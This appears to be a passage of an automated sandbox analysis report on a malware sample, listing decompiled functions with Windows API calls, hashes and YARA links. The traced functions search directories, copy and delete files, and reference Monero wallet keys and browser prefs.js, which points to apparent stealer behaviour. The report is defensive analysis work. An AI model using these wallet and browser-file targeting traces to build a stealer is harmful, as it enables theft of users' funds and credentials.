                                        • Opcode Fuzzy Hash: c3b95895bd81b9d4cf65a7152431b7d98f4c41f18c691b94b6a4713ef05a400e
                                        • Instruction Fuzzy Hash: 95E1B672A111189AEB54FB60DD51EEE7338BF64301F404699B90B62092EF306F8ECF56
                                        Function 00A4F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                          • Part of subcall function 00A5A920: lstrcpy.KERNEL32(00000000,?), ref: 00A5A972
                                          • Part of subcall function 00A5A920: lstrcat.KERNEL32(00000000), ref: 00A5A982
                                          • Part of subcall function 00A5A9B0: lstrlen.KERNEL32(?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A5A9C5
                                          • Part of subcall function 00A5A9B0: lstrcpy.KERNEL32(00000000), ref: 00A5AA04
                                          • Part of subcall function 00A5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A5AA12
                                          • Part of subcall function 00A5A8A0: lstrcpy.KERNEL32(?,00A60E17), ref: 00A5A905
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00A615B8,00A60D96), ref: 00A4F71E
                                        • StrCmpCA.SHLWAPI(?,00A615BC), ref: 00A4F76F
                                        • StrCmpCA.SHLWAPI(?,00A615C0), ref: 00A4F785
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00A4FAB1
                                        • FindClose.KERNEL32(000000FF), ref: 00A4FAC3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID: prefs.js
                                        • API String ID: 3334442632-3783873740
                                        • Opcode ID: 3052828c356465711fb326483e856c73f821602ba03a26889ce307fa3e2fc919
                                        • Instruction ID: 9ab5ec8d26c1e0e70d384df21688e87a20d5541f8c2a39b61e905c0a79968b40
                                        • Opcode Fuzzy Hash: 3052828c356465711fb326483e856c73f821602ba03a26889ce307fa3e2fc919
                                        • Instruction Fuzzy Hash: 70B16475A001189FDB24FF60DD95FEE7778BFA4301F4086A8A80A96141EF306B4DCB92
                                        Function 00A416D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00A6510C,?,?,?,00A651B4,?,?,00000000,?,00000000), ref: 00A41923
                                        • StrCmpCA.SHLWAPI(?,00A6525C), ref: 00A41973
                                        • StrCmpCA.SHLWAPI(?,00A65304), ref: 00A41989
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00A41D40
                                        • DeleteFileA.KERNEL32(00000000), ref: 00A41DCA
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00A41E20
                                        • FindClose.KERNEL32(000000FF), ref: 00A41E32
                                          • Part of subcall function 00A5A920: lstrcpy.KERNEL32(00000000,?), ref: 00A5A972
                                          • Part of subcall function 00A5A920: lstrcat.KERNEL32(00000000), ref: 00A5A982
                                          • Part of subcall function 00A5A9B0: lstrlen.KERNEL32(?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A5A9C5
                                          • Part of subcall function 00A5A9B0: lstrcpy.KERNEL32(00000000), ref: 00A5AA04
                                          • Part of subcall function 00A5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A5AA12
                                          • Part of subcall function 00A5A8A0: lstrcpy.KERNEL32(?,00A60E17), ref: 00A5A905
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                        • String ID: \*.*
                                        • API String ID: 1415058207-1173974218
                                        • Opcode ID: 645fc0a877d5a853c4a78e1dd68484af87faea54f7d61b52e4717aa016df5f9c
                                        • Instruction ID: 413b22e6cc2351df2aab50a8e7c5a3fa96f08cd7779ab9bd54a8bfa15327ce5a
                                        • Opcode Fuzzy Hash: 645fc0a877d5a853c4a78e1dd68484af87faea54f7d61b52e4717aa016df5f9c
                                        • Instruction Fuzzy Hash: CF12E271A10118ABDB15FB60DD96EEE7378BF64301F404699B90A66091EF306F8DCFA1
                                        Function 00A4DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                          • Part of subcall function 00A5A9B0: lstrlen.KERNEL32(?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A5A9C5
                                          • Part of subcall function 00A5A9B0: lstrcpy.KERNEL32(00000000), ref: 00A5AA04
                                          • Part of subcall function 00A5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A5AA12
                                          • Part of subcall function 00A5A8A0: lstrcpy.KERNEL32(?,00A60E17), ref: 00A5A905
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00A60C2E), ref: 00A4DE5E
                                        • StrCmpCA.SHLWAPI(?,00A614C8), ref: 00A4DEAE
                                        • StrCmpCA.SHLWAPI(?,00A614CC), ref: 00A4DEC4
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00A4E3E0
                                        • FindClose.KERNEL32(000000FF), ref: 00A4E3F2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                        • String ID: \*.*
                                        • API String ID: 2325840235-1173974218
                                        • Opcode ID: 011a01c888d2925f07901651472adcc74e8667c96e69b34de6d143837f7c3f5a
                                        • Instruction ID: 8d6f5c307cf827be5c2bf31fc22fdaf0d69d3e384313e1fbe80592b27da0f714
                                        • Opcode Fuzzy Hash: 011a01c888d2925f07901651472adcc74e8667c96e69b34de6d143837f7c3f5a
                                        • Instruction Fuzzy Hash: 85F18F71A141189ADB15FB60DD95EEE7338BF64301F8046D9B90A62091EF306F8ECF66
                                        Function 00DFDCDA Relevance: 14.1, Strings: 10, Instructions: 1578COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: !d]$)(nz$7E:$9Fu}$Au_?$N&q/$QrO$^\?E$a/$_?o
                                        • API String ID: 0-4131716743
                                        • Opcode ID: f5878ca884986541d42ec6c00de436c78796a921bde16fa61b32068dcb6c7ced
                                        • Instruction ID: 6b94bd65de020cca85ccec797f15bd67fbbb083cc572278fad543d4704d1ea97
                                        • Opcode Fuzzy Hash: f5878ca884986541d42ec6c00de436c78796a921bde16fa61b32068dcb6c7ced
                                        • Instruction Fuzzy Hash: DFB2C5F3A0C2009FE314AE2DEC8566ABBE9EF94720F16893DE6C4C7744E63558058797
                                        Function 00A4DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                          • Part of subcall function 00A5A920: lstrcpy.KERNEL32(00000000,?), ref: 00A5A972
                                          • Part of subcall function 00A5A920: lstrcat.KERNEL32(00000000), ref: 00A5A982
                                          • Part of subcall function 00A5A9B0: lstrlen.KERNEL32(?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A5A9C5
                                          • Part of subcall function 00A5A9B0: lstrcpy.KERNEL32(00000000), ref: 00A5AA04
                                          • Part of subcall function 00A5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A5AA12
                                          • Part of subcall function 00A5A8A0: lstrcpy.KERNEL32(?,00A60E17), ref: 00A5A905
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00A614B0,00A60C2A), ref: 00A4DAEB
                                        • StrCmpCA.SHLWAPI(?,00A614B4), ref: 00A4DB33
                                        • StrCmpCA.SHLWAPI(?,00A614B8), ref: 00A4DB49
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00A4DDCC
                                        • FindClose.KERNEL32(000000FF), ref: 00A4DDDE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID:
                                        • API String ID: 3334442632-0
                                        • Opcode ID: 1430105291274a313b7632c5b47e6cb41770fa116a85c1194b9945f694e6429d
                                        • Instruction ID: d8f33e69f9364072a3195df8f0a9b25dc98ec09dd2317bcef3406e3ba6d0e54c
                                        • Opcode Fuzzy Hash: 1430105291274a313b7632c5b47e6cb41770fa116a85c1194b9945f694e6429d
                                        • Instruction Fuzzy Hash: 96914476A00104ABDB14FB70DD96AED777CBBD8301F408659FD0A96181FE349B4D8B92
                                        Function 00E0B11B Relevance: 11.6, Strings: 8, Instructions: 1616COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: s+=$![$&G~$6?~~$T"=$awo$isw$zXi
                                        • API String ID: 0-1048270282
                                        • Opcode ID: 5d9b545667148d0294a5fc7d588a4039bd1502826df8ee229b65d17b6966ad05
                                        • Instruction ID: 0dcdf746f22c531862be08f23d49b7c3e82b47f4ec88597e8ffab0de6d0ac9e5
                                        • Opcode Fuzzy Hash: 5d9b545667148d0294a5fc7d588a4039bd1502826df8ee229b65d17b6966ad05
                                        • Instruction Fuzzy Hash: D0B219F3A086049FE3046E2DEC8567AFBE9EF94720F1A493DEAC4C3744E53598058796
                                        Function 00A57B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                        • GetKeyboardLayoutList.USER32(00000000,00000000,00A605AF), ref: 00A57BE1
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00A57BF9
                                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 00A57C0D
                                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00A57C62
                                        • LocalFree.KERNEL32(00000000), ref: 00A57D22
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                        • String ID: /
                                        • API String ID: 3090951853-4001269591
                                        • Opcode ID: 30a5ed722a4fa053f4a3da96d412fe6d16e390a6344727f65cfec1717fcb6bb6
                                        • Instruction ID: 74e227d5726ecdb8d7263eddeaa813d49dac0f9b9e0218c0134efd48a64c7e1f
                                        • Opcode Fuzzy Hash: 30a5ed722a4fa053f4a3da96d412fe6d16e390a6344727f65cfec1717fcb6bb6
                                        • Instruction Fuzzy Hash: B1413D71A40218ABDB24DB94DD99BEEB778FF54701F2042D9E80962191DB342F89CFA1
                                        Function 00E06251 Relevance: 10.4, Strings: 7, Instructions: 1626COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: c~^$'`>?$1*6v$_5?w$a6U_$eh_z$ya_I
                                        • API String ID: 0-1569725176
                                        • Opcode ID: 7dd79ada3a1fae340914412c778fbf8a7a4778ae0951682ad9aac2806f47bab0
                                        • Instruction ID: 14ddd8cdb544cd2eae5b02cb79906a40eb4beaacea9a82a640de3612c061c813
                                        • Opcode Fuzzy Hash: 7dd79ada3a1fae340914412c778fbf8a7a4778ae0951682ad9aac2806f47bab0
                                        • Instruction Fuzzy Hash: D6B218F350C2049FE704AE2DEC8567ABBE9EF94720F1A493DEAC5C3344EA3558058697
                                        Function 00E097E0 Relevance: 10.3, Strings: 7, Instructions: 1535COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: $^+?$:=>$N.5^$`p!Z$hB'$op~{$yQ7~
                                        • API String ID: 0-1260419190
                                        • Opcode ID: f856de9e43874260b8084e5b9f506ce8bda840bff019684311d9efc1f27bab2e
                                        • Instruction ID: c8b6b85b69544ad63a13b96069a782e99999cb39cb88d1e299f99c5de8eb6723
                                        • Opcode Fuzzy Hash: f856de9e43874260b8084e5b9f506ce8bda840bff019684311d9efc1f27bab2e
                                        • Instruction Fuzzy Hash: C6A2F7F3608204AFE3046F2DEC85A7AFBE5EF94720F16893DEAC487744E63558058697
                                        Function 00A4E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                          • Part of subcall function 00A5A920: lstrcpy.KERNEL32(00000000,?), ref: 00A5A972
                                          • Part of subcall function 00A5A920: lstrcat.KERNEL32(00000000), ref: 00A5A982
                                          • Part of subcall function 00A5A9B0: lstrlen.KERNEL32(?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A5A9C5
                                          • Part of subcall function 00A5A9B0: lstrcpy.KERNEL32(00000000), ref: 00A5AA04
                                          • Part of subcall function 00A5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A5AA12
                                          • Part of subcall function 00A5A8A0: lstrcpy.KERNEL32(?,00A60E17), ref: 00A5A905
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00A60D73), ref: 00A4E4A2
                                        • StrCmpCA.SHLWAPI(?,00A614F8), ref: 00A4E4F2
                                        • StrCmpCA.SHLWAPI(?,00A614FC), ref: 00A4E508
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00A4EBDF
                                        Strings
                                        Memory Dump Source
